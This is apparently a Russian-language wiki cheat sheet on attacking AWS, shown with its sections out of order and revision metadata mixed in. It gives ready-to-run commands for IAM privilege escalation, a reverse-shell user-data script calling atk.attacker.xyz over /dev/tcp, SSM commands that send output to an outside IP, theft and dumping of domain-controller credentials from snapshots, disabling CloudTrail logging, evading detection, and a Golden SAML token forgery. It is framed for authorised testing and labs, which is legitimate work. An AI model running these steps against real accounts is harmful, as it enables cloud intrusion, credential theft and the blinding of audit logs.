11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:A2i.png]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

https://aws.amazon.com/ru/codeguru/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Файл:A2i.png

2022-10-17T10:50:36Z

Drakylar:

Aws

2022-10-17T10:48:34Z

Drakylar: /* Augmented AI (Amazon A2I) */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
